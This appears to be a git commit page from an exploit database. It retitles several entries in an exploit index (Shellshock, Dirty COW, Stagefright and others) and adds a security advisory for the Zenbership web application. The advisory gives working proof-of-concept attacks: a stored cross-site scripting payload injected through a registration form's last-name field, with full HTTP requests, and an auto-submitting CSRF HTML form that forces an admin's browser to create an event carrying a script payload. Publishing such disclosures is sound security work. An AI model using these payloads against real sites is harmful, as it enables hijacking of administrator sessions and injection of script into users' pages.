DB: 2016-10-24
1 new exploits dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock) dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock) Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC) Microsoft Excel 2010 - Crash PoC (2) Microsoft Excel 2010 - Crash (PoC) (2) Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit) Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit) The Unarchiver 3.11.1 - '.tar.Z' Crash PoC The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC) Microsoft Edge - Function.apply Infomation Leak (MS16-119) Microsoft Edge - 'Function.apply' Information Leak (MS16-119) Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit) Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit) Zenbership 107 - Multiple Vulnerabilities
This commit is contained in:
parent
6cd9390ff2
commit
e380b207ce
2 changed files with 191 additions and 7 deletions
15
files.csv
15
files.csv
|
@ -33425,7 +33425,7 @@ id,file,description,date,author,platform,type,port
|
|||
36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
|
||||
36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
|
||||
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 / 4.1.1 - Authentication Bypass",2012-05-13,fdiskyou,windows,remote,5900
|
||||
36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)",2014-09-29,fdiskyou,linux,remote,0
|
||||
36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock)",2014-09-29,fdiskyou,linux,remote,0
|
||||
36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - listing.aspx searchText Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
|
||||
36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - /help/helpredir.aspx guide Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
|
||||
36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System - /webi/webi_modify.aspx id Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
|
||||
|
@ -35840,7 +35840,7 @@ id,file,description,date,author,platform,type,port
|
|||
39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - SHFolder.dll Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0
|
||||
39509,platforms/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - '.pm4' Integer Division By Zero",2016-03-01,LiquidWorm,windows,dos,0
|
||||
39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0
|
||||
39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0
|
||||
39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)",2016-03-01,"Shantanu Khandelwal",windows,dos,0
|
||||
39513,platforms/php/webapps/39513.txt,"WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80
|
||||
39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,php,remote,80
|
||||
39515,platforms/windows/remote/39515.rb,"Netgear ProSafe Network Management System 300 - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080
|
||||
|
@ -36123,7 +36123,7 @@ id,file,description,date,author,platform,type,port
|
|||
39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bindshell with Configurable Port Shellcode (87 bytes)",2016-05-16,JollyFrogs,lin_x86,shellcode,0
|
||||
39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,php,webapps,0
|
||||
39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0
|
||||
39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash PoC (2)",2016-05-16,HauntIT,windows,dos,0
|
||||
39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash (PoC) (2)",2016-05-16,HauntIT,windows,dos,0
|
||||
39820,platforms/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
|
||||
39821,platforms/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",python,webapps,0
|
||||
39822,platforms/multiple/webapps/39822.rb,"Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",multiple,webapps,0
|
||||
|
@ -36569,7 +36569,7 @@ id,file,description,date,author,platform,type,port
|
|||
40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088
|
||||
40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
|
||||
40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
|
||||
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
|
||||
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
|
||||
40438,platforms/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,windows,local,0
|
||||
40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
|
||||
40442,platforms/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Elevation of Privilege",2016-09-30,Tulpa,windows,local,0
|
||||
|
@ -36675,7 +36675,7 @@ id,file,description,date,author,platform,type,port
|
|||
40566,platforms/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",php,webapps,0
|
||||
40567,platforms/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,windows,local,0
|
||||
40569,platforms/java/webapps/40569.txt,"ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure",2016-10-18,p0z,java,webapps,0
|
||||
40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash PoC",2016-10-18,"Antonio Z.",osx,dos,0
|
||||
40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",osx,dos,0
|
||||
40571,platforms/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",cgi,webapps,80
|
||||
40572,platforms/windows/local/40572.cs,"Microsoft Windows - DFS Client Driver Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
|
||||
40573,platforms/windows/local/40573.cs,"Microsoft Windows - DeviceApi CMApi PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
|
||||
|
@ -36706,12 +36706,12 @@ id,file,description,date,author,platform,type,port
|
|||
40599,platforms/windows/dos/40599.txt,"Microsoft Windows - 'win32k.sys' TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
|
||||
40600,platforms/windows/dos/40600.txt,"Microsoft Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",windows,dos,0
|
||||
40601,platforms/windows/dos/40601.txt,"Microsoft Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",windows,dos,0
|
||||
40603,platforms/windows/dos/40603.html,"Microsoft Edge - Function.apply Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
|
||||
40603,platforms/windows/dos/40603.html,"Microsoft Edge - 'Function.apply' Information Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
|
||||
40605,platforms/windows/dos/40605.html,"Microsoft Edge - Spread Operator Stack Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
|
||||
40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
|
||||
40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
|
||||
40608,platforms/windows/local/40608.cs,"Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
|
||||
40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
|
||||
40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
|
||||
40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099
|
||||
40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
|
||||
40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection",2016-10-21,"Arbin Godar",php,webapps,0
|
||||
|
@ -36720,3 +36720,4 @@ id,file,description,date,author,platform,type,port
|
|||
40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
|
||||
40618,platforms/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos,0
|
||||
40619,platforms/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)",2016-10-21,"Hacker Fantastic",hardware,remote,0
|
||||
40620,platforms/php/webapps/40620.txt,"Zenbership 107 - Multiple Vulnerabilities",2016-10-23,Besim,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
183
platforms/php/webapps/40620.txt
Executable file
183
platforms/php/webapps/40620.txt
Executable file
|
@ -0,0 +1,183 @@
|
|||
1. ADVISORY INFORMATION
|
||||
========================================
|
||||
Title: Zenbership (latest version) - Multiple Vulnerabilities
|
||||
Application: Zenbership
|
||||
Class: Sensitive Information disclosure
|
||||
Versions Affected: <= latest version )
|
||||
Vendor URL: https://www.zenbership.com/
|
||||
Software URL: https://www.zenbership.com/Download
|
||||
Bugs: CSRF / Persistent Cross Site Scripting
|
||||
Date of found: 23.10.2016
|
||||
Author: Besim
|
||||
|
||||
|
||||
2.CREDIT
|
||||
========================================
|
||||
Those vulnerabilities was identified by Besim ALTINOK and Mrs. Meryem AKDOĞAN
|
||||
|
||||
|
||||
3. VERSIONS AFFECTED
|
||||
========================================
|
||||
<= latest version
|
||||
|
||||
|
||||
|
||||
4. TECHNICAL DETAILS & POC
|
||||
========================================
|
||||
|
||||
|
||||
PR1 - Stored Cross Site Scripting
|
||||
========================================
|
||||
|
||||
1 ) Admin login admin panel
|
||||
2 ) Create contact form for guest (http://site_name/path/register.php?action=reset&id=3c035c2)
|
||||
3 ) Attacker enter xss payload to last name input
|
||||
4 ) XSS Payload run when admin looked contact page (http://site_name/path/admin/index.php?l=contacts)
|
||||
5 ) Vulnerability Parameter and Payload : &last_name=<Script>alert('ExploitDB')</Script>
|
||||
|
||||
## HTTP Request ##
|
||||
|
||||
POST /zenbership/pp-functions/form_process.php HTTP/1.1
|
||||
Host: site_name
|
||||
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://site_name/zenbership/register.php?action=reset&id=3c035c2
|
||||
Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44; zen_cart=WJL-1484545251; zen_0176e737b450bbd83f5fc1066=253782
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 153
|
||||
|
||||
- POST DATA
|
||||
|
||||
page=1
|
||||
&session=zen_0176e737b450bbd83f5fc1066
|
||||
&first_name=Besim
|
||||
&last_name=<Script>alert('ExploitDB')</Script>
|
||||
&email=exploit@yopmail.com
|
||||
|
||||
|
||||
PR2 - CSRF
|
||||
========================================
|
||||
|
||||
1 ) Attacker can add new event with xss payload (stored)
|
||||
- File : admin/cp-functions/event-add.php
|
||||
|
||||
HTTP Request and CSRF PoC
|
||||
=========================
|
||||
|
||||
|
||||
## HTTP Request ##
|
||||
|
||||
POST /zenbership/admin/cp-functions/event-add.php HTTP/1.1
|
||||
Host: site_name
|
||||
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: http://site_name/zenbership/admin/index.php?l=events
|
||||
Content-Length: 1206
|
||||
Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_cart=LKQ-4724862238; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44
|
||||
Connection: close
|
||||
|
||||
|
||||
- POST DATA
|
||||
|
||||
|
||||
id=JFW996951
|
||||
&ext=
|
||||
&edit=0
|
||||
&event[id]=JFW996951&event[status]=1
|
||||
&event[name]=<Script>alert('Meryem-ExploitDB');</Script>
|
||||
&event[tagline]=Meryem&event[description]=<p>Meryem AKDOGAN</p>
|
||||
&event[post_rsvp_message]=<p>Meryem AKDOGAN</p>
|
||||
&event[calendar_id]=1
|
||||
&event[custom_template]=
|
||||
&tags=
|
||||
&event[starts]=2016-10-26 00:00:00
|
||||
&event[ends]=2016-10-28 00:00:00
|
||||
&event[start_registrations]=2016-10-24 00:00:00
|
||||
&event[close_registration]=&event[early_bird_end]=
|
||||
&event[online]=0&event[location_name]=Turkey
|
||||
&event[url]=&event[address_line_1]=
|
||||
&event[address_line_2]=&event[city]=
|
||||
&event[state]=&event[zip]=
|
||||
&event[country]=
|
||||
&event[phone]=
|
||||
&limit_attendees_dud=0
|
||||
&event[max_rsvps]=
|
||||
&event[members_only_view]=0
|
||||
&event[members_only_rsvp]=0
|
||||
&event[allow_guests]=1
|
||||
&event[max_guests]=1
|
||||
&form[col2][Account Overview]=section
|
||||
&form[col2][company_name]=1
|
||||
&form[col2][address_line_1]=0
|
||||
&form[col2][address_line_2]=0
|
||||
&form[col2][city]=0
|
||||
&form[col2][state]=0
|
||||
&form[col2][zip]=0
|
||||
&form[col2][country]=0
|
||||
&form[col2][url]=0
|
||||
|
||||
|
||||
|
||||
## CSRF PoC ##
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC -->
|
||||
<body>
|
||||
<form action="http://site_name/path/admin/cp-functions/event-add.php" method="POST">
|
||||
<input type="hidden" name="id" value="OXH978786" />
|
||||
<input type="hidden" name="ext" value="" />
|
||||
<input type="hidden" name="edit" value="0" />
|
||||
<input type="hidden" name="event[id]" value="OXH978786" />
|
||||
<input type="hidden" name="event[status]" value="1" />
|
||||
<input type="hidden" name="event[name]" value="<script>alert('Meryem-ExploitDB');</Script>" />
|
||||
<input type="hidden" name="event[tagline]" value="meryem" />
|
||||
<input type="hidden" name="event[description]" value="<p>Meryem AKDOGAN</p> " />
|
||||
<input type="hidden" name="event[post_rsvp_message]" value="<p>Meryem AKDOGAN</p> " />
|
||||
<input type="hidden" name="event[calendar_id]" value="1" />
|
||||
<input type="hidden" name="event[custom_template]" value="" />
|
||||
<input type="hidden" name="tags" value="meryem" />
|
||||
<input type="hidden" name="event[starts]" value="2016-10-26 00:00:00" />
|
||||
<input type="hidden" name="event[ends]" value="2016-10-28 00:00:00" />
|
||||
<input type="hidden" name="event[start_registrations]" value="2016-10-24 00:00:00" />
|
||||
<input type="hidden" name="event[close_registration]" value="" />
|
||||
<input type="hidden" name="event[early_bird_end]" value="" />
|
||||
<input type="hidden" name="event[online]" value="0" />
|
||||
<input type="hidden" name="event[location_name]" value="Turkey" />
|
||||
<input type="hidden" name="event[url]" value="" />
|
||||
<input type="hidden" name="event[address_line_1]" value="" />
|
||||
<input type="hidden" name="event[address_line_2]" value="" />
|
||||
<input type="hidden" name="event[city]" value="" />
|
||||
<input type="hidden" name="event[state]" value="" />
|
||||
<input type="hidden" name="event[zip]" value="" />
|
||||
<input type="hidden" name="event[country]" value="" />
|
||||
<input type="hidden" name="event[phone]" value="" />
|
||||
<input type="hidden" name="limit_attendees_dud" value="0" />
|
||||
<input type="hidden" name="event[max_rsvps]" value="" />
|
||||
<input type="hidden" name="event[members_only_view]" value="0" />
|
||||
<input type="hidden" name="event[members_only_rsvp]" value="0" />
|
||||
<input type="hidden" name="event[allow_guests]" value="1" />
|
||||
<input type="hidden" name="event[max_guests]" value="1" />
|
||||
<input type="hidden" name="form[col2][Account Overview]" value="section" />
|
||||
<input type="hidden" name="form[col2][company_name]" value="1" />
|
||||
<input type="hidden" name="form[col2][address_line_1]" value="0" />
|
||||
<input type="hidden" name="form[col2][address_line_2]" value="0" />
|
||||
<input type="hidden" name="form[col2][city]" value="0" />
|
||||
<input type="hidden" name="form[col2][state]" value="0" />
|
||||
<input type="hidden" name="form[col2][zip]" value="0" />
|
||||
<input type="hidden" name="form[col2][country]" value="0" />
|
||||
<input type="hidden" name="form[col2][url]" value="0" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
<script>
|
||||
document.forms[0].submit();
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
Loading…
Add table
Reference in a new issue